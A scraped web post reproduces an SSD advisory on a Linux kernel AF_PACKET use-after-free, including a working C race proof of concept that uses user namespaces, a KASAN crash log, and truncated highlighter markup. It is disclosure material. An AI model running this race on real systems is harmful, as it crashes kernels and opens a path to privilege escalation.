{"id":9947,"date":"2017-10-17T14:19:57","date_gmt":"2017-10-17T22:19:57","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/10\/17\/news-3720\/"},"modified":"2017-10-17T14:19:57","modified_gmt":"2017-10-17T22:19:57","slug":"news-3720","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/10\/17\/news-3720\/","title":{"rendered":"SSD Advisory \u2013 Linux Kernel AF_PACKET Use-After-Free"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Tue, 17 Oct 2017 11:42:53 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:ssd@beyondsecurity.com\">ssd@beyondsecurity.com<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability summary<\/strong><br \/> The following advisory describes a use-after-free vulnerability found in the Linux kernel&#8217;s implementation of AF_PACKET that can lead to privilege escalation.<\/p>\n<p>AF_PACKET sockets &#8220;allow users to send or receive packets on the device driver level. This for example lets them implement their own protocol on top of the physical layer or to sniff packets including Ethernet and higher level protocol headers&#8221;<\/p>\n<p><strong>Credit<\/strong><br \/> The vulnerability was discovered by an independent security researcher who reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> &#8220;It is quite likely that this is already fixed by:<br \/> packet: hold bind lock when rebinding to fanout hook &#8211; http:\/\/patchwork.ozlabs.org\/patch\/813945\/<\/p>\n<p>Also relevant, but not yet merged is<br \/> packet: in packet_do_bind, test fanout with bind_lock held &#8211; http:\/\/patchwork.ozlabs.org\/patch\/818726\/<\/p>\n<p>We verified that this does not trigger on v4.14-rc2, but does trigger when reverting that first mentioned commit (008ba2a13f2d).&#8221;<\/p>\n<p><strong>Vulnerability details<\/strong><\/p>\n<p>This use-after-free is due to a race condition between <em>fanout_add()<\/em> (called from setsockopt) and <em>bind()<\/em> on an AF_PACKET socket.<\/p>\n<p>The race causes <em>__unregister_prot_hook()<\/em>, called from <em>packet_do_bind()<\/em>, to set <em>po->running<\/em> to 0 even though a <em>packet_fanout<\/em> has already been created by <em>fanout_add()<\/em>.
<\/p>\n<p>This allows us to bypass the check in <em>unregister_prot_hook()<\/em> from <em>packet_release()<\/em>, effectively causing the <em>packet_fanout<\/em> to be released while it is still referenced from the <em>packet_type<\/em> linked list.<\/p>\n<p><strong>Crash Proof of Concept<\/strong><\/p>\n<div id=\"crayon-59e6820c9ab00732088113\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">\/\/ Please note, to have KASAN report the UAF, you need to enable it when compiling the kernel.\n\/\/ the kernel config is provided too.\n\n#define _GNU_SOURCE\n\n#include &lt;stdio.h&gt;\n#include &lt;stdlib.h&gt;\n#include &lt;string.h&gt;\n#include &lt;unistd.h&gt;\n#include &lt;sys\/types.h&gt;\n#include &lt;sys\/socket.h&gt;\n#include &lt;sys\/ioctl.h&gt;\n#include &lt;net\/if.h&gt;\n#include &lt;pthread.h&gt;\n#include &lt;sys\/utsname.h&gt;\n#include &lt;sched.h&gt;\n#include &lt;stdarg.h&gt;\n#include &lt;stdbool.h&gt;\n#include &lt;sys\/stat.h&gt;\n#include &lt;fcntl.h&gt;\n\n#define IS_ERR(c, s) { if (c) perror(s); }\n\n\/\/ local copy of struct sockaddr_ll, so &lt;linux\/if_packet.h&gt; is not needed\nstruct sockaddr_ll {\n\tunsigned short\tsll_family;\n\tshort\t\tsll_protocol; \/\/ big endian\n\tint\t\tsll_ifindex;\n\tunsigned short\tsll_hatype;\n\tunsigned char\tsll_pkttype;\n\tunsigned char\tsll_halen;\n\tunsigned char\tsll_addr[8];\n};\n\nstatic int fd;\nstatic struct ifreq ifr;\nstatic struct sockaddr_ll addr;\n\n\/\/ thread 1: setsockopt(SOL_PACKET (0x107), PACKET_FANOUT (18)) -&gt; fanout_add() allocates the packet_fanout\nvoid *task1(void *unused)\n{\n\tint fanout_val = 0x3;\n\n\t\/\/ need race: check on po-&gt;running\n\t\/\/ also must be 1st or link wont register\n\tint err = setsockopt(fd, 0x107, 18, &amp;fanout_val, sizeof(fanout_val));\n\t\/\/ IS_ERR(err == -1, \"setsockopt\");\n\treturn NULL;\n}\n\n\/\/ thread 2: bind() -&gt; packet_do_bind() -&gt; __unregister_prot_hook() clears po-&gt;running\nvoid *task2(void *unused)\n{\n\tint err = bind(fd, (struct sockaddr *)&amp;addr, sizeof(addr));\n\t\/\/ IS_ERR(err == -1, \"bind\");\n\treturn NULL;\n}\n\nvoid loop_race(void)\n{\n\tint err, index;\n\n\twhile(1) {\n\t\tfd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);\n\t\tIS_ERR(fd == -1, \"socket\");\n\n\t\tstrcpy((char *)&amp;ifr.ifr_name, \"lo\");\n\t\terr = ioctl(fd, SIOCGIFINDEX, &amp;ifr);\n\t\tIS_ERR(err == -1, \"ioctl SIOCGIFINDEX\");\n\t\tindex = ifr.ifr_ifindex;\n\n\t\terr = ioctl(fd, SIOCGIFFLAGS, &amp;ifr);\n\t\tIS_ERR(err == -1, \"ioctl SIOCGIFFLAGS\");\n\n\t\t\/\/ bring lo down before binding to it\n\t\tifr.ifr_flags &amp;= ~(short)IFF_UP;\n\t\terr = ioctl(fd, SIOCSIFFLAGS, &amp;ifr);\n\t\tIS_ERR(err == -1, \"ioctl SIOCSIFFLAGS\");\n\n\t\taddr.sll_family = AF_PACKET;\n\t\taddr.sll_protocol = 0x0; \/\/ need something different to rehook &amp;&amp; 0 to skip register_prot_hook\n\t\taddr.sll_ifindex = index;\n\n\t\tpthread_t thread1, thread2;\n\t\tpthread_create(&amp;thread1, NULL, task1, NULL);\n\t\tpthread_create(&amp;thread2, NULL, task2, NULL);\n\n\t\tpthread_join(thread1, NULL);\n\t\tpthread_join(thread2, NULL);\n\n\t\t\/\/ UAF: packet_release() frees the fanout while it is still linked from packet_type\n\t\tclose(fd);\n\t}\n}\n\nstatic bool write_file(const char* file, const char* what, ...) {\n\tchar buf[1024];\n\tva_list args;\n\tva_start(args, what);\n\tvsnprintf(buf, sizeof(buf), what, args);\n\tva_end(args);\n\tbuf[sizeof(buf) - 1] = 0;\n\tint len = strlen(buf);\n\n\tint fd = open(file, O_WRONLY | O_CLOEXEC);\n\tif (fd == -1)\n\t\treturn false;\n\tif (write(fd, buf, len) != len) {\n\t\tclose(fd);\n\t\treturn false;\n\t}\n\tclose(fd);\n\treturn true;\n}\n\n\/\/ enter a new user + net namespace: this grants CAP_NET_RAW \/ CAP_NET_ADMIN over that\n\/\/ namespace (needed for AF_PACKET sockets and SIOCSIFFLAGS) without real root\nvoid setup_sandbox(void) {\n\tint real_uid = getuid();\n\tint real_gid = getgid();\n\n\tif (unshare(CLONE_NEWUSER) != 0) {\n\t\tprintf(\"[!] unprivileged user namespaces are not available\\n\");\n\t\tperror(\"[-] unshare(CLONE_NEWUSER)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (unshare(CLONE_NEWNET) != 0) {\n\t\tperror(\"[-] unshare(CLONE_NEWNET)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (!write_file(\"\/proc\/self\/setgroups\", \"deny\")) {\n\t\tperror(\"[-] write_file(\/proc\/self\/setgroups)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (!write_file(\"\/proc\/self\/uid_map\", \"0 %d 1\\n\", real_uid)) {\n\t\tperror(\"[-] write_file(\/proc\/self\/uid_map)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (!write_file(\"\/proc\/self\/gid_map\", \"0 %d 1\\n\", real_gid)) {\n\t\tperror(\"[-] write_file(\/proc\/self\/gid_map)\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nint main(int argc, char *argv[])\n{\n\tsetup_sandbox();\n\tsystem(\"id; capsh --print\");\n\tloop_race();\n\treturn 0;\n}<\/textarea><\/div>\n<\/div>\n<p><strong>Crash report<\/strong><\/p>\n<div id=\"crayon-59e6820c9ab0b974057516\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> [   73.703931] dev_remove_pack: ffff880067cee280 not found  [   73.717350] ==================================================================  [   73.726151] BUG: KASAN: use-after-free in dev_add_pack+0x1b1\/0x1f0  [   73.729371] Write of size 8 at addr ffff880067d28870 by task poc\/1175  [   73.732594]   [   73.733605] CPU: 3 PID: 1175 Comm: poc Not tainted 4.14.0-rc1+ #29  [   73.737714] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.1-1ubuntu1 04\/01\/2014  [   73.746433] Call Trace:  [   73.747985]  dump_stack+0x6c\/0x9c  [   73.749410]  ? dev_add_pack+0x1b1\/0x1f0  [   73.751622]  print_address_description+0x73\/0x290  [   73.753646]  ? 
dev_add_pack+0x1b1\/0x1f0  [   73.757343]  kasan_report+0x22b\/0x340  [   73.758839]  __asan_report_store8_noabort+0x17\/0x20  [   73.760617]  dev_add_pack+0x1b1\/0x1f0  [   73.761994]  register_prot_hook.part.52+0x90\/0xa0  [   73.763675]  packet_create+0x5e3\/0x8c0  [   73.765072]  __sock_create+0x1d0\/0x440  [   73.766030]  SyS_socket+0xef\/0x1b0  [   73.766891]  ? move_addr_to_kernel+0x60\/0x60  [   73.769137]  ? exit_to_usermode_loop+0x118\/0x150  [   73.771668]  entry_SYSCALL_64_fastpath+0x13\/0x94  [   73.773754] RIP: 0033:0x44d8a7  [   73.775130] RSP: 002b:00007ffc4e642818 EFLAGS: 00000217 ORIG_RAX: 0000000000000029  [   73.780503] RAX: ffffffffffffffda RBX: 00000000004002f8 RCX: 000000000044d8a7  [   73.785654] RDX: 0000000000000011 RSI: 0000000000000003 RDI: 0000000000000011  [   73.790358] RBP: 00007ffc4e642840 R08: 00000000000000ca R09: 00007f4192e6e9d0  [   73.793544] R10: 0000000000000000 R11: 0000000000000217 R12: 000000000040b410  [   73.795999] R13: 000000000040b4a0 R14: 0000000000000000 R15: 0000000000000000  [   73.798567]   [   73.799095] Allocated by task 1360:  [   73.800300]  save_stack_trace+0x16\/0x20  [   73.802533]  save_stack+0x46\/0xd0  [   73.803959]  kasan_kmalloc+0xad\/0xe0  [   73.805833]  kmem_cache_alloc_trace+0xd7\/0x190  [   73.808233]  packet_setsockopt+0x1d29\/0x25c0  [   73.810226]  SyS_setsockopt+0x158\/0x240  [   73.811957]  entry_SYSCALL_64_fastpath+0x13\/0x94  [   73.814636]   [   73.815367] Freed by task 1175:  [   73.816935]  save_stack_trace+0x16\/0x20  [   73.821621]  save_stack+0x46\/0xd0  [   73.825576]  kasan_slab_free+0x72\/0xc0  [   73.827477]  kfree+0x91\/0x190  [   73.828523]  packet_release+0x700\/0xbd0  [   73.830162]  sock_release+0x8d\/0x1d0  [   73.831612]  sock_close+0x16\/0x20  [   73.832906]  __fput+0x276\/0x6d0  [   73.834730]  ____fput+0x15\/0x20  [   73.835998]  task_work_run+0x121\/0x190  [   73.837564]  exit_to_usermode_loop+0x131\/0x150  [   73.838709]  syscall_return_slowpath+0x15c\/0x1a0  [   
73.840403]  entry_SYSCALL_64_fastpath+0x92\/0x94  [   73.842343]   [   73.842765] The buggy address belongs to the object at ffff880067d28000  [   73.842765]  which belongs to the cache kmalloc-4096 of size 4096  [   73.845897] The buggy address is located 2160 bytes inside of  [   73.845897]  4096-byte region [ffff880067d28000, ffff880067d29000)  [   73.851443] The buggy address belongs to the page:  [   73.852989] page:ffffea00019f4a00 count:1 mapcount:0 mapping:          (null) index:0x0 compound_mapcount: 0  [   73.861329] flags: 0x100000000008100(slab|head)  [   73.862992] raw: 0100000000008100 0000000000000000 0000000000000000 0000000180070007  [   73.866052] raw: dead000000000100 dead000000000200 ffff88006cc02f00 0000000000000000  [   73.870617] page dumped because: kasan: bad access detected  [   73.872456]   [   73.872851] Memory state around the buggy address:  [   73.874057]  ffff880067d28700: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  [   73.876931]  ffff880067d28780: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  [   73.878913] &gt;ffff880067d28800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  [   73.880658]                                                              ^  [   73.884772]  ffff880067d28880: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  [   73.890978]  ffff880067d28900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  [   73.897763] ==================================================================<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-2\">2<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-59e6820c9ab0b974057516-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-59e6820c9ab0b974057516-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-44\">44<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-59e6820c9ab0b974057516-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-59e6820c9ab0b974057516-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-73\">73<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-1\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.703931<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dev_remove_pack<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff880067cee280 <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">found<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-2\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.717350<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span 
class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-3\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.726151<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">BUG<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">KASAN<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">use<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">after<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">free <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dev_add_pack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1b1<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1f0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-4\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.729371<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Write <\/span><span class=\"crayon-e\">of <\/span><span class=\"crayon-i\">size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">at 
<\/span><span class=\"crayon-e\">addr <\/span><span class=\"crayon-e\">ffff880067d28870 <\/span><span class=\"crayon-e\">by <\/span><span class=\"crayon-e\">task <\/span><span class=\"crayon-v\">poc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1175<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-5\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.732594<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-6\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.733605<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CPU<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PID<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1175<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Comm<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">poc <\/span><span class=\"crayon-st\">Not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">tainted<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4.14.0<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">rc1<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#29<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-7\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.737714<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Hardware 
<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">QEMU <\/span><span class=\"crayon-e\">Standard <\/span><span class=\"crayon-e\">PC<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">i440FX<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PIIX<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1996<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">BIOS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1.10.1<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1ubuntu1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">04<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">01<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">2014<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-8\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.746433<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Call <\/span><span class=\"crayon-v\">Trace<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-9\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.747985<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dump_stack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x6c<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x9c<\/span><\/div>\n<div class=\"crayon-line 
